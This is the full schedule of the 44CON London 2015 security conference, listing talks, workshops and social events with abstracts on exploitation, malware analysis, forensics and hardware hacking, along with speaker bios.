44CON LONDON 2015: Full Schedule

18:00 BST

Registration opens

44CON LONDON 2015 Opens with the Community Evening. Free to attend (registration required) we have talks and a film!

Wednesday September 9, 2015 18:00 - 18:29 BST
Track 2

Networking

18:00 BST

Registration opens

44CON LONDON 2015 Opens with the Community Evening. Free to attend (registration required) we have talks and a film!

Wednesday September 9, 2015 18:00 - 18:29 BST
Workshop

Networking

18:00 BST

Registration opens

44CON LONDON 2015 Opens with the Community Evening. Free to attend (registration required) we have talks and a film!

Wednesday September 9, 2015 18:00 - 18:29 BST
Track 1

Networking

18:30 BST

44CON LONDON 2015 Community Evening Opening

44CON LONDON 2015 Opens with the Community Evening. Free to attend (registration required) we have talks and a film!

Speakers

adrian

Event Director, 44CON, SINCON, alien8 Security

Wednesday September 9, 2015 18:30 - 18:44 BST
Track 1

Track 1 Talk

18:45 BST

Stegosploit - Drive-by Browser Exploits using only Images

"A good exploit is one that is delivered with style".

Stegosploit creates a new way to encode "drive-by" browser exploits and deliver them through image files. These payloads are undetectable using current means. This paper discusses two broad underlying techniques used for image based exploit delivery - Steganography and Polyglots. Drive-by browser exploits are steganographically encoded into JPG and PNG images. The resultant image file is fused with HTML and Javascript decoder code, turning it into an HTML+Image polyglot. The polyglot looks and feels like an image, but is decoded and triggered in a victim's browser when loaded.

Speakers

Saumil Shah

Saumil Shah is the founder and CEO of Net-Square, providing cutting edge information security services to clients around the globe. Saumil is an internationally recognized speaker and instructor, having regularly presented at conferences like 44CON, Blackhat, RSA, CanSecWest... Read More →

Wednesday September 9, 2015 18:45 - 19:44 BST
Track 1

Track 1 Talk

19:45 BST

Get in the Ring0 - Understanding Windows drivers

Separate your IRPs from your IRQLs, people, it's time to learn about Windows drivers. Turns out they're not magic. Who knew?

Speakers

Graham Sutherland

Penetration Tester, Portcullis Computer Security

Graham Sutherland is a penetration tester working for Portcullis Computer Security in London. Before making the career move to security, he spent several years paying his dues as a developer. He is primarily self-taught and spent the best part of a decade doing independent security... Read More →

Wednesday September 9, 2015 19:45 - 20:44 BST
Track 1

Track 1 Talk

19:45 BST

How to drive a malware analyst crazy

This talk will discuss the different methods malware authors use to complicate the malware forensics / reverse engineering. It will discuss both the history of anti-forensics and what is being used today.

Speakers

Michael Boman

Pensionsmyndigheten

Michael is a malware researcher, developer, speaker and founder of Malware Research Institute, an organisation that promotes and develops tools, techniques and procedures for malware research, malware forensics and incident response. Michael's interest in malware began when his... Read More →

Wednesday September 9, 2015 19:45 - 20:44 BST
Workshop

Workshop Talk

22:00 BST

Film: Hackers

Wednesday September 9, 2015 22:00 - 23:59 BST
Track 2

Film

08:30 BST

Registration opens

44CON LONDON 2015 opens for registration

Thursday September 10, 2015 08:30 - 09:14 BST
Track 2

Networking

08:30 BST

Registration opens

44CON LONDON 2015 opens for registration

Thursday September 10, 2015 08:30 - 09:14 BST
Track 1

Networking

08:30 BST

Registration opens

44CON LONDON 2015 opens for registration

Thursday September 10, 2015 08:30 - 09:14 BST
Workshop

Networking

09:15 BST

44CON LONDON 2015 Opening

Speakers

adrian

Event Director, 44CON, SINCON, alien8 Security

Thursday September 10, 2015 09:15 - 09:29 BST
Track 1

Track 1 Talk

09:30 BST

Smart Muttering; a story and toolset for smart meter platform

The use of smart meters and their associated technologies is becoming more widespread as utility providers struggle to deal with ever growing demand and scarcer resources. The European Union has deployed over 46 million smart meters to date, with an additional 119 million smart meters intended to be deployed in member countries by 2019. Likewise, in the United States of America, there are indications that the number of smart meters deployed had topped the 50 million mark in middle July, 2014.

Previous work has shown security and privacy concerns with smart metering specifically, with researchers at IOActive even developing a "Smart Grid Worm". However, this work has done little to open either smart meter research to a wider audience, or provide tools for approaching new platforms and devices.

To address this, we developed a pluggable framework and easy-to-build low-cost hardware platform for embedded device protocol analysis and manipulation. Both of which will be released under an open-source license during the talk.

Whilst smart devices have been developed for managing resources, their functionality has also been found to be applicable to other spheres, resulting in technologies (based on, or similar to smart technologies) often being found in other applications. Some smart device platforms are also used in process management applications, and even transport management systems. The resources governed by these systems are regarded as critical infrastructure by most governments. Disruption of these systems could result in significant damage to national infrastructure – or even political instability in a region targeted by attackers. In addition to smart networks, the advent of the so-called "Internet of Things", has added a plethora of new devices to home networks. Thus these technologies are responsible for securing access to both nation-state as well as residential resources, making research in this area an important concern.

Given the present and growing criticality of these devices, we embarked on a lengthy assessment of the popular LonMark platform as implemented in the Echelon Series 5000-based devices with the aim of discovering platform-wide vulnerabilities that could be used to attack devices or their backend management platforms.

However, no to very little tools exist for assessing devices making use of obscure networks or protocols. Currently, attacking smart meters, interconnected hardware and associated applications – is not as simple as firing up a web proxy and intercepting traffic, as is the case with web applications, something this talk hopes to change. In most cases, the devices communicate over mediums researchers may not be familiar with and may use custom protocols, resulting in difficulties obtaining access to network communication streams.

To counter these obstacles, I will present various mechanisms for assessing the security of obscure networks, protocols and devices. This will be performed using off-the-shelf hardware and a custom framework for conducting this type of work.

This toolset, the result of thousands of hours worth of research, will provide functionality for conducting traditional sniffing, replay and fuzzing attacks against devices making use of wired connections. Using this framework, the analyst will practically demonstrate attacks against the smart devices used during the course of this research.

Previously, we have demonstrated vulnerabilities in Z-Wave home automation and security devices at BlackHat [1], as well as building proxy frameworks for obscure protocols such as SAP DIAG that led to a significant opening up of the protocol for further research [2]. Thus, this work, while on a different platform is a natural extension of past expertise and interests.

Speakers

Ian de Villiers

Ian de Villiers is a security analyst and researcher at SensePost. Coming from a development background, his areas of expertise are in application and web application assessments. Ian has spent considerable time researching application frameworks, and has published a number of... Read More →

Thursday September 10, 2015 09:30 - 10:29 BST
Track 1

Track 1 Talk

09:30 BST

Attacking VxWorks: from Stone Age to Interstellar

VxWorks is the world’s most widely-used real-time operating system deployed in embedded systems. Its market reach spans across all safety critical fields, including the Mars Curiosity rover, Boeing 787 Dreamliner, network routers to name a few. The safety critical nature of these applications make VxWorks security a major concern.

Our team has conducted a thorough security analysis on VxWorks, including its supported network protocols and OS security mechanism. We will present the tool we developed for VxWorks assessment. The main goal of our tool is to provide effective penetration testing by implementing the WdbRPC protocol in python. To show its effectiveness, we are going to reveal some of the bugs we discovered along the way.

Finally, we will wrap up by demonstrating the vulnerability we found that allows remote code execution on most VxWorks based devices. A quick Internet scan shows that at least 100k devices running VxWorks are connected to the Internet. Considering the popularity of VxWorks in the age of IoT, this issue will have a widespread impact.

Speakers

Yannick Formaggio

Yannick is a french passionate IT security researcher at Istuary Innovation Group. He graduated from Bordeaux 1 University (France) with a master of science in Cryptography and IT Security in 2010. He worked 4 years as a subcontracting IT Security consultant for Airbus and Thales... Read More →

Thursday September 10, 2015 09:30 - 10:29 BST
Track 2

Track 2 Talk

10:30 BST

Break

Thursday September 10, 2015 10:30 - 10:59 BST
Track 2

Networking

10:30 BST

Break

Thursday September 10, 2015 10:30 - 10:59 BST
Track 1

Networking

10:30 BST

Introduction to Reverse Engineering C++

C++ and Object Oriented Programming (OOP) has been around for a while. Software (small to large scale projects) and malware are leveraging C++ and OOP more and more. Understanding how to program and reverse engineer C++ can aid in finding or exploiting vulnerabilities, performing in-depth analysis on malware, hacking games, etc.

In this workshop we will discuss

C++ Overview: Builds a foundation of C++-isms to ensure everyone understands the basic concepts we will discuss during the workshop. Some C++ topics that will be covered: class keyword, scope operator (::), public/private/protected keywords, constructor/destructor, getter/setter methods, this keyword, etc.
Polymorphism: What is polymorphism and what it adds to C++ programming that cannot be accomplished in a C application
Class Relationships and Binding Types: Highlights three different class relationships (containment, association, and inheritance) and how binding types (compile vs run time) affect the assembly generated by the compiler
Reversing Strategies: Developing a methodology for reverse engineering C++ object oriented programs with IDA Pro by leveraging structures and applying them to the disassembly. All previously discussed topics will be revisited at the assembly level.

This workshop requires attendees to:

Understand C and x86 Assembly
Have a Windows XP or higher VM
Have a free, license, or demo version of IDA Pro
Have a version of Microsoft's Visual Studio

Speakers

Angel Villega

Angel doesn't like writing about himself... Angel is a Research Engineer within the Talos Security Intelligence and Research Group at Cisco. He is based in Maryland, USA. In this role he conducts in-depth analysis of malware, vulnerability research, and develops software.

Thursday September 10, 2015 10:30 - 12:29 BST
Workshop

Workshop

11:00 BST

Is there an EFI monster inside your apple?

A few weeks ago I publicly disclosed an Apple EFI firmware zero day.
It was a very powerful bug allowing direct access to the EFI firmware from the operating system. EFI rootkits are some of the most powerful and most interesting rootkits. Because they work at a very low level they can play a lot of tricks to hide themselves from forensics and persist for a long time.

EFI monsters are a bit like jaguars, stealthy and rarely seen by humans. This doesn't mean they do not exist. EFI monsters are most certainly part of spy agencies rootkits catalog.
Very few tools exist to chase them.

This talk is about introducing you to the EFI world so you can also start to chase these monsters. EFI world might look scary but it's a bit easier than you think and a lot of fun.

Reference blogpost:
https://reverse.put.as/2015/07/01/reversing-prince-harmings-kiss-of-death/

Plus content about EFI layout, where to seek rootkits and so on.
Essentially an introduction to EFI and how to find out potential rootkits there.

Speakers

Pedro Vilaça

A leading expert in the field of not being an expert, plays with computers for more than 30 years, holds a degree in Economics and a MBA, writes a somewhat famous OS X related blog, breaks copy protections for fun and profit, annoys HackingTeam, trolls Apple’s product security policy... Read More →

Thursday September 10, 2015 11:00 - 11:59 BST
Track 1

Track 1 Talk

11:00 BST

Meterpreter: Understanding the New Shiny

The last couple of years have seen Meterpreter move forward leaps and bounds when it comes to new features and stability. Metasploit users worldwide continue to make use of it for its core feature set that is already well known, but are yet to benefit from the new features that are starting to make it a more compelling tool for red team engagements.

The goal of this talk will be to bring people up to speed on how Meterpreter has changed, evolved and become what it is in 2015. Old features will be covered, and new features will be discussed in depth, with a focus on how those new features can be used to help red teamers establish and maintain a stronger foothold in their target's network.

This presentation will not only discuss the features at a high level, but will also dive deeper into some of the more technical details around the new and more interesting features, including stageless payloads, transport modification, paranoid mode, and persistence. It will also cover some of the common pitfalls that cause shells to fail, and how to avoid them.

It may even cover a sneak peak of what's to come further down the track!

Speakers

OJ Reeves

Founder, Beyond Binary

OJ Reeves is an Australian security professional who specialises in attack simulation. When not breaking networks and software he is actively contributing to the Metasploit framework, with a particular focus on Meterpreter.

Thursday September 10, 2015 11:00 - 11:59 BST
Track 2

Track 2 Talk

12:00 BST

Lunch

Thursday September 10, 2015 12:00 - 13:29 BST
Track 1

Networking

12:00 BST

Lunch

Thursday September 10, 2015 12:00 - 13:29 BST
Track 2

Networking

12:30 BST

Lunch

Thursday September 10, 2015 12:30 - 13:29 BST
Workshop

Networking

13:30 BST

DDoS mitigation EPIC FAIL collection

I have been researching DDoS attacks and mitigation techniques for the past three years and worked with industry leaders on testing their systems, providing them with cutting edge, and even never-seen-before attacks.
I was amazed (actually still am) to find out that those big corporations, investing much work into their architecture of defense came to FAIL and sometimes the sole reason for a successful attack was a mitigation configuration or architecture FAIL.
My research is done by utilizing smart grids of computers, mimicking vast botnets from all over the world, writing and perfecting scripted attacks and even involve social engineering attempts within those attacks (for mitigation that involve manual intervention)
In the presentation there will be a showcase of 10 such FAILs, detailed technically as for a step-by-step close follow on the attack strategy and its mitigation failing, and of course - how delving into a recommended setup for a proper mitigation technique that will not inflict such a direct damage as presented.

Speakers

Moshe Zioni

Moshe (dalmoz) have been researching security since he was 14, got to the realization about the age of 20 that there is a market for hackers - now called Pentesters, and people will actually pay you for your "service". Nowadays consulting to industry leaders, banks, software vendors... Read More →

Thursday September 10, 2015 13:30 - 14:29 BST
Track 1

Track 1 Talk

13:30 BST

Old Dog, New Tricks: Forensics With PowerShell

Recent intrusion into the networks of organizations like Office of Personnel Management, Sony, JPMorgan Chase, and British Airways have shown that the question isn’t “if” your organization will be targeted, but “when”. With these attacks and many others in recent years, incident response teams have had to rapidly change tactics from the “image-and-forget” methodology to live box forensics and containment. During these engagements, forensic analysts must actively track and monitor an adversary in their network while preventing the adversary from recognizing detection but most tools are not up to the job. PowerShell brings the flexibility and in-memory nature to defenders to tackle live threats.

In this talk, I will cover how my project, PowerForensics, can provide the Digital Forensics/Incident Response community with an all in one toolset for attack response and investigation. By leveraging PowerShell’s access to the Windows API and .NET framework, PowerForensics provides investigators with a forensically sound “live” investigation platform without the need to image the hard drive. I’ll cover the background and overview of PowerForensics, including how its various capabilities can facilitate the investigation of advanced actors at scale. Finally, I’ll cap off with a complex demo, showing how PowerForensics can help blue teams investigate the real attacks they’re now facing. PowerShell isn’t just for the red team anymore.

Speakers

Jared Atkinson

Jared Atkinson is the Hunt Capability Lead with Veris Group’s Adaptive Threat Division and is an Adjunct Lecturer in Utica College’s M.S. in Cybersecurity program. Before working for Veris Group, Jared spent 4 years leading incident response missions for the U.S. Air Force... Read More →

Thursday September 10, 2015 13:30 - 14:29 BST
Track 2

Track 2 Talk

13:30 BST

Analyzing Malicious Office Documents

In this workshop (2 hours), I explain how to use the tools (oledump, emldump, YARA rules, ...) I developed to analyze (malicious) Microsoft Office documents.
I have around 20 exercises that explain step by step to the workshop participants how they can analyze malicious office documents with my Python tools. Microsoft Office is not required for the analysis.

Speakers

Didier Stevens

Didier Stevens (Microsoft MVP Consumer Security, SANS ISC Handler, Wireshark Certified Network Analyst, ...) is a Senior Analyst working at NVISO (https://www.nviso.be). Didier has developed and published more than 100 tools, several of them popular in the security community. You... Read More →

Thursday September 10, 2015 13:30 - 15:29 BST
Workshop

Workshop

14:30 BST

reverse reverse engineering

Note: This talk will not be recorded.
Richo will walk attendees through the basic architecture of a traditional AOT compiler and runtime loader, and describe the parallels between this and the operation of a modern bytecode VM (python, ruby, etc). With this newfound knowledge, we'll tackle implementing a tool to reverse engineer a sample of obfuscated ruby. However, instead of analyzing the bytecode directly, we will instead implement a malicious, but otherwise fully functional VM, and use that to explore the various anti-analysis tricks deployed.

By the end of the talk, you will have extended insight into the conceptual inner workings of a compiler, and feel equipped to implement substitutes for the interesting parts of a traditional compilation/loader pipeline to trick opaque objects into telling you how they work, instead of the other way around. While the demos will focus on ruby, the techniques demonstrated are equally applicable to python, etc.

Speakers

richö butts

Security Engineer, Stripe

richö spends most of his time flying parachutes and flinging himself off things. But he also hacks computers and hangs out with nerds.

Thursday September 10, 2015 14:30 - 15:29 BST
Track 1

Track 1 Talk

14:30 BST

Dark Fairytales from a Phisherman (Vol.II)

Phishing attacks are a prevalent threat against large or small organisations. As professionals in the security field we need to be able to give our clients the look and feel of what a real "bad guy" may do to attack an organisation.

Leverage Phishing Frenzy and BeEF on your next engagement to ensure your client is getting the most out of their assessment. With simple templates you can launch an effective phishing campaign in minutes, and thanks to the BeEF integration you’ll be hooking and exploiting browsers in no time.

Have you ever wondered what is the best pretext to use during your phishing campaign use-case? What about timeframes? We’ll discuss statistics based on real-world professional phishing engagements. We'll also entertain you with fun (and real) hacking stories involving phishing and client-side exploitation.

Expect some new code to be released during this talk:

Phishing Frenzy and BeEF seamless integration (including geo location services, visual map representation, and browser finger-printing);

A solid BeEF autorun engine based on exploitation templates;

Exploit automation of common enterprise scenarios like Outlook Web Access, Citrix, HTA attacks and others.

With such an open source Swiss army knife in your tool-bag you can finally enjoy your coffee while waiting for credentials and shells.

Speakers

Michele Orru

antisnatchor – Michele is the lead core developer and smart-minds-recruiter for the BeEF project. Michele is also the co-author of the "Browser Hacker's Handbook." He has a deep knowledge of programming in multiple languages and paradigms, and is excited to apply this knowledge... Read More →

Thursday September 10, 2015 14:30 - 15:29 BST
Track 2

Track 2 Talk

15:30 BST

44CON LONDON 2015 afternoon tea

Thursday September 10, 2015 15:30 - 15:59 BST
Track 2

Networking

15:30 BST

44CON LONDON 2015 afternoon tea

Thursday September 10, 2015 15:30 - 15:59 BST
Track 1

Networking

15:30 BST

44CON LONDON 2015 afternoon tea

Thursday September 10, 2015 15:30 - 15:59 BST
Workshop

Networking

16:00 BST

Inside Terracotta VPN

Virtual Private Networks (VPN) are very popular. They are part and parcel for almost every enterprise network, especially those with remote employees. Aside from VPNs for enterprises, there are many reputable commercial VPN services that offer low cost, reliable service to individual users. These users employ VPNs for reasons that might include connection security, protection of privacy data, online gaming acceleration, and bypassing service provider restrictions. VPN’s are also popular with cyber criminals, as it is one way the latter can obscure their true source location. When a commercial VPN service provider uses resources such as servers and copious bandwidth stolen or repurposed from unsuspecting victims for purposes of profit, the offering clearly crosses into the criminal domain. In this report, FirstWatch exposes one such operator doing business with multiple VPN brand names out of the People’s Republic of China (PRC). At last count, the Terracotta VPN node ecosystem consisted of more than 1500 systems around the globe. Every Windows server running as a Terracotta VPN node that FirstWatch was able to verify was hacked.

The operators behind Terracotta VPN continue their broad campaign to compromise multiple victim organizations around the world. Meanwhile, advanced threat actors such as Shell_Crew (Google RSA Shell_Crew for details) use Terracotta VPN to anonymize their activity while they hack the crap out of governments and commercial entities around the world. While RSA has yet to release the paper to the public, an earlier version of Inside Terracotta VPN was presented to Microsoft’s invitation-only Digital Crimes Consortium (DCC 2105) conference in Miami. This presenter will share with the 44CON London audience otherwise non-public information previously restricted to law enforcement on how this was discovered, and other stuff not appearing in the paper to be released by RSA (this summer).

Speakers

Kent Backman

Kent is a threat intelligence analyst with FirstWatch, the threat intelligence group behind RSA's threat intelligence-driven products including RSA Security Analytics, formerly Netwitness. FirstWatch typically tracks things with no name. Within the small FirstWatch group, Kent's... Read More →

Thursday September 10, 2015 16:00 - 16:59 BST
Track 1

Track 1 Talk

16:00 BST

A Trek to the Emerald City: Ring -1 Based AV

To compete in the endless race against rootkits, antivirus software vendors are slowly starting to use the Virtualization Extensions offered by commodity CPUs.

The attack surface of AV software has been has been large enough until now, but hypervisor-based AV solutions expose a whole new attack surface. By exploiting flaws in AV software, instead of Ring 0 control or full Administrator privileges, it is now possible to gain Ring -1 permissions, an almost jackpot-like Ring which allows controlling the Virtualization Extensions our CPUs employ.

This talk takes us into the realm of Hypervisor based AVs, to see how well they've managed to walk in the depths or Ring -1 in their attempts to implement a thin hypervisor layer to help in the fight against rootkits.

Why

I worked on a couple of Hypervisor-based AVs and found interesting attack surface points in there. I think that nowadays although most of us are using AVs we're not even aware of the insecurity they're providing.

Other than that, the whole hype of "VMM" or "Ring -1" things makes it even fun, there are not many people around the globe which audit VMM code, mostly because people are afraid of those fancy words like Extended Page Tables, VM Exits and mainly memory handling.

In this presentation I'll try to remove this fear, I'll show the basic architecture of a VM-based AV and how it communicates with the outside world (e.g - usermode) and how it might be possible to abuse it in order to gain code execution and system control.

Speakers

Shift

Shift is a Freelance Security Researcher interested in the fields of Computer Security.

Thursday September 10, 2015 16:00 - 16:59 BST
Track 2

Track 2 Talk

16:00 BST

Indicators of Compromise: From malware analysis to eradication

This workshop takes you through the steps from locating a unknown malware inside the corporate network to analyzing the sample to identify the indicators of compromise and use those to eradicate the malware from the enterprise network using freely available tools - some that you might already have deployed.

Speakers

Michael Boman

Pensionsmyndigheten

Thursday September 10, 2015 16:00 - 17:59 BST
Workshop

Workshop

17:00 BST

Barbarians At The Gate(way): An Examination Of The Attacker's Tool Box

This talk will examine the tools, methods and data behind the DDoS attacks that are prevalent in the news headlines. Using information collected, the presentation will demonstrate what the attackers are using to cause their mischief & mayhem, and examine the timeline and progression of attackers as they move from the historical page defacers to the motivated DDoS attacker.

We will look at the motivations and rationale that they have and try to share some sort of understanding as to what patterns to be aware of for their own protection.

Speakers

Dave Lewis

Akamai Technologies

Dave has almost two decades of industry experience. He has extensive experience in IT operations and management. Currently, Dave is a Global Security Advocate for Akamai Technologies . He is the founder of the security site Liquidmatrix Security Digest and co-host of the Liquidmatrix... Read More →

Thursday September 10, 2015 17:00 - 17:59 BST
Track 1

Track 1 Talk

17:00 BST

Reverse engineering and exploiting font rasterizers: the OpenType saga

Font rasterization software is clearly among the most desirable attack vectors of all time, due to multiple reasons: the wide variety of font file formats, their significant structural and logical complexity, typical programming language of choice (C/C++), average age of the code, ease of exploit delivery and internal scripting capabilities provided by the most commonly used formats (TrueType and OpenType). As every modern widespread browser, document viewer and operating system is exposed to processing external, potentially untrusted fonts, this area of security has a long history of research. As a result, nearly every major vendor releases font-related security advisories several times a year, yet we can still hear news about more 0-days floating in the wild.

Over the course of the last few months, we performed a detailed security audit of the implementation of OpenType font handling present in popular libraries, client-side applications and operating systems, which appears to have received much less attention in comparison to e.g. TrueType. During that time, we discovered a number of critical vulnerabilities, which could be used to achieve 100% reliable arbitrary code execution, bypassing all currently deployed exploit mitigations such as ASLR, DEP or SSP. More interestingly, a number of those vulnerabilities were found to be common across various products, enabling an attacker to create chains of exploits consisting of a very limited number of distinct security bugs.

The presentation will outline the current state of the art with regards to font security research, in the context of how the overall field of typography has evolved over the years, both back in the 80's and 90's and the more recent times, including the connections and ties between various font engines seen today. Following the enumeration of potential attack surfaces, we will discuss the process of reverse-engineering widespread proprietary OpenType/CFF implementations such as the Windows kernel ATMFD.DLL module (Adobe Type Manager Font Driver), and provide an in-depth analysis of the root cause and reliable exploitation process of vulnerabilities discovered in products such as Microsoft Windows, Adobe Reader, DirectWrite (Internet Explorer), FreeType and others.

Speakers

Mateusz Jurczyk

Mateusz is the vice-captain of the Dragon Sector CTF team and a big fan of memory corruption. His main areas of interest are client software security, vulnerability exploitation and mitigation techniques, and delving into the darkest corners of low-level kernel internals with a... Read More →

Thursday September 10, 2015 17:00 - 17:59 BST
Track 2

Track 2 Talk

18:00 BST

44CON LONDON 2015 Gin O'Clock

Thursday September 10, 2015 18:00 - 18:59 BST
Workshop

Networking

18:00 BST

44CON LONDON 2015 Gin O'Clock

Thursday September 10, 2015 18:00 - 18:59 BST
Track 1

Networking

18:00 BST

44CON LONDON 2015 Gin O'Clock

Thursday September 10, 2015 18:00 - 18:59 BST
Track 2

Networking

19:00 BST

44CON LONDON 2015 Evening Session

All sorts of things going on to keep Attendees, Sponsors and Crew entertained.

Thursday September 10, 2015 19:00 - 19:34 BST
Workshop

Networking

19:00 BST

44CON LONDON 2015 Evening Session

All sorts of things going on to keep Attendees, Sponsors and Crew entertained.

Thursday September 10, 2015 19:00 - 19:34 BST
Track 2

Networking

19:00 BST

44CON LONDON 2015 Evening Session

All sorts of things going on to keep Attendees, Sponsors and Crew entertained.

Thursday September 10, 2015 19:00 - 19:34 BST
Track 1

Networking

19:35 BST

Exploiting 64-bit IE on Windows 8.1 - The Pwn2Own Case Study

Instead of 32-bit IE, this year's Pwn2Own competition selected 64-bit Internet Explorer as the target for the first time.
64-bit IE brings new challenges to exploit writers, for example, simple heap spraying technique will not work in 64-bit process.
And in order to win the game, we also need to bypass the control flow guard (CFG) mitigation on windows 8.1 as well as the enhanced protected mode (EPM) sandbox of IE.

In this presentation, we will disclose the details of the 2 vulnerabilities we used to take down 64-bit IE in Pwn2Own 2015 for the first time.
We will go through the poc exploit to demonstrate the techniques we used to work out a working IE 64-bit exploit.
We will show how we achieved ASLR & CFG bypass and remote code execution in 64-bit IE with a single uninitialized memory bug.
We will also discuss the bug we used to bypass IE's EPM sandbox to achieve elevation of privilege.

Speakers

Yuki Chen

Yuki Chen is the core member of 360Vulcan Team from 360 Safeguard offensive and defensive research group. In March this year, 360Vulcan Team successfully exploited 64-bit Internet Explorer with EPM enabled at Pwn2Own 2015 in vancouver. Yuki Chen has 6+ years’ experience in security... Read More →

Linan Hao

Thursday September 10, 2015 19:35 - 20:29 BST
Track 1

Track 1 Talk

19:35 BST

Jtagsploitation: 5 wires, 5 ways to root

JTAG comes up in nearly every hardware-related hack. In order to do anything via JTAG, you generally need a hardware debugging device that connects to anything from a standard header to undocumented test points scattered around a device. JTAG access is almost always 'game over' but it's not always clear how to turn that hardware access into privileged software access on the system.
This talk will enumerate a number of different ways to turn a 'check' for jtag access into the 'checkmate' of root shell access. Each example will demonstrate a unique method for getting root access via JTAG. Each method is also general enough to be broadly applicable across different hardware architectures and implementations. Example code and scripts will be released at the talk.

Speakers

Joe FitzPatrick

Joe FitzPatrick (@securelyfitz) has spent a decade working on low-level silicon debug, security validation, and penetration testing of CPUS, SOCs, and microcontrollers. He develops and delivers hardware security training at https://SecuringHardware.com, including Applied Physical Attacks on x86 Systems. In between, he keeps busy with contributions to the NSA Playset and other misdirected hardware projects, which he presents at all sorts of fun conferences... Read More →

Matt King

Matt is a hardware security resarcher at a large semiconductor company.

Thursday September 10, 2015 19:35 - 20:29 BST
Track 2

Track 2 Talk

19:35 BST

The IOT Evening Workshop

101 logic probing
vulnerable device playing (scales, cameras, routers & things)"
102 firmware analysys + extraction
mobile app decompilation

Thursday September 10, 2015 19:35 - 22:59 BST
Workshop

Workshop

20:30 BST

Playing with Fire: Attacking the FireEye MPS

Note: This talk will not be recorded.
This talk will give an overview of a number of vulnerabilities in FireEye's Malware Protection System (MPS) that were recently discovered (and which are patched in the interim). These range from command injections in the management web interface over local privilege escalation vulnerabilities to exploits that allow a full compromise of the system by simply sending a malicious file over the network and exploiting bugs in the analysis process.
We will discuss the inherent attack exposure of certain types of network security controls, together with architectural recommendations how those could be addressed.

Speakers

Felix Wilhelm

Felix is a security researcher working for ERNW GmbH. His main interests are application security, reverse engineering and virtualization security. Felix has disclosed critical vulnerabilities in popular software such as Hyper-V, Xen, Typo3 or IBM GPFS and has presented his work... Read More →

Thursday September 10, 2015 20:30 - 21:29 BST
Track 1

Track 1 Talk

20:30 BST

Film: Sneakers

Thursday September 10, 2015 20:30 - 22:29 BST
Track 2

Film

21:30 BST

44CON LONDON 2015 Pub Quiz

Speakers

Jerry Gamblin

¯\_(ツ)_/¯, Kenna Security

Thursday September 10, 2015 21:30 - 22:29 BST
Track 1

22:30 BST

Hunted

Could you go on the run? Fourteen ordinary people on the run from a team of expert hunters. #Hunted: a real life thriller. And it's here.

Going off-grid is now a near impossible task. Our surveillance society catches us on CCTV up to seventy times a day, but the ever-watching eye can see much further than that.

Now everything from cash withdrawals to supermarket shopping, from telephone calls to social media posts are monitored. Our journeys are tracked, our locations are stored and our most personal of details sit on scores of anonymous databases. So is it ever possible to slip through the net in a surveillance nation?

But if you had to disappear tomorrow and become a fugitive, could you escape the tracks of your electronic footprint and head off grid? And just how would you go about it?

This summer, a group of ordinary Brits will go on the run. They will film their own adventures themselves as they take extreme measures to try to evade capture from our expert hunters. What they do and where they go will be up to them – but with a team of Hunters seeking them out and tracking them down, their task of going dark will be truly tested.

Thursday September 10, 2015 22:30 - 23:30 BST
Track 1

Film

22:30 BST

Film: Blade Runner - Director's Cut

Thursday September 10, 2015 22:30 - Friday September 11, 2015 00:59 BST
Track 2

Film

01:00 BST

Bar open until late

Bar open until 4am (if enough demand)

Friday September 11, 2015 01:00 - 04:00 BST
Track 2

Networking

09:10 BST

44CON LONDON 2015 Day 2 Open

Friday September 11, 2015 09:10 - 09:29 BST
Track 2

Networking

09:10 BST

44CON LONDON 2015 Day 2 Open

Friday September 11, 2015 09:10 - 09:29 BST
Track 1

Networking

09:10 BST

44CON LONDON 2015 Day 2 Open

Friday September 11, 2015 09:10 - 09:29 BST
Workshop

Networking

09:30 BST

Software Defined Networking (SDN) Security

SDN is rapidly moving from R&D to production deployment, with some frightening security implications. This presentation will provide an overview of emerging SDN technologies, the attack surfaces they expose, and the kinds of vulnerabilities that have already been discovered in popular SDN controllers. A live demo of several exploits will show the potential security implications of deploying SDN in production today. Finally we will look at some efforts currently underway to improve the security of SDN controllers.

Speakers

David Jorm

David has been involved in the security industry for the last 15 years. During this time he has found high-impact and novel flaws in dozens of major Java components. He has worked for Red Hat's security team, led a Chinese startup that failed miserably, wrote the core aviation... Read More →

Friday September 11, 2015 09:30 - 10:29 BST
Track 1

Track 1 Talk

09:30 BST

15-Minute Linux Incident Response Live Analysis

This presentation will show attendees how to perform an initial live analysis of a Linux system in mere minutes. The focus of the talk will be a set of shell scripts that allow an investigator to quickly make a determination as to whether or not an incident has occurred without the need to shutdown the system to perform traditional dead analysis.

Within 15 minutes the investigator should have a rough idea of what has transpired and will be in a better position to determine if dead analysis is warranted. The shell scripts presented minimize the disturbance to the system and send all information to a forensics workstation over the network.

Nothing beyond basic Linux knowledge (user not administrator) is required of attendees. Attendees will leave with some tools for live analysis and also a good introduction to shell scripting for those that are new to this topic.

Speakers

Philip Polstra

Dr. Phil Polstra was born at an early age and has been programming since age 8 and hacking electronics since age 12. He is currently an Associate Professor teaching Digital Forensics and computer security at Bloomsburg University of Pennsylvania. He is no stranger to infosec conferences... Read More →

Friday September 11, 2015 09:30 - 10:29 BST
Track 2

Track 2 Talk

10:30 BST

Break

Friday September 11, 2015 10:30 - 11:29 BST
Track 1

Networking

10:30 BST

Break

Friday September 11, 2015 10:30 - 11:29 BST
Workshop

Networking

10:30 BST

Break

Friday September 11, 2015 10:30 - 11:29 BST
Track 2

Networking

11:30 BST

Going AUTH the Rails on a Crazy Train

Rails has a strong foundation in convention over configuration. In this regard, Rails handles a lot of security related conventions for developers, keeping them safe from vulnerabilities such as SQL Injection, XSS, and CSRF out of the box. However, authentication and authorization logic is largely left up to the developer. It is here that the abilities of the framework hit the end of the track and it’s up to the developers to keep themselves safe. In this talk, we take a look at patterns that we’ve seen across some of the largest Rails applications on the internet and cover common pitfalls that you as a security researcher and/or developer can watch out for. We will also be discussing and releasing a new dynamic analysis tool for Rails applications to help pentesters navigate through authentication and authorization solutions in Rails.

Speakers

Jeff Jarmoc

Jeff is a Senior Application Security Consultant at NCC Group who has contributed code to the Brakeman Rails Security Scanning tool. He’s perhaps best known in the Rails community for his whitepaper The Anatomy of a Rails Vulnerability in which he deeply explored remote code execution... Read More →

Tomek Rabczak

Tomek is an Application Security Consultant at NCC Group with experience in secure web application development, security tool research and development, code review, and penetration testing. Over the past 2 years, he has looked at and assessed the security of some of the largest... Read More →

Friday September 11, 2015 11:30 - 12:29 BST
Track 1

Track 1 Talk

11:30 BST

Forging the USB armory

The availability of modern System on a Chip (SoC) parts, having low power consumption and high integration of most computer components in a single chip, empowers the open source community in creating all kind of embedded systems.

The presentation illustrates the journey that we have taken to develop an open hardware board first of its kind: the USB armory, an open source hardware design, implementing a flash drive sized computer for security applications.

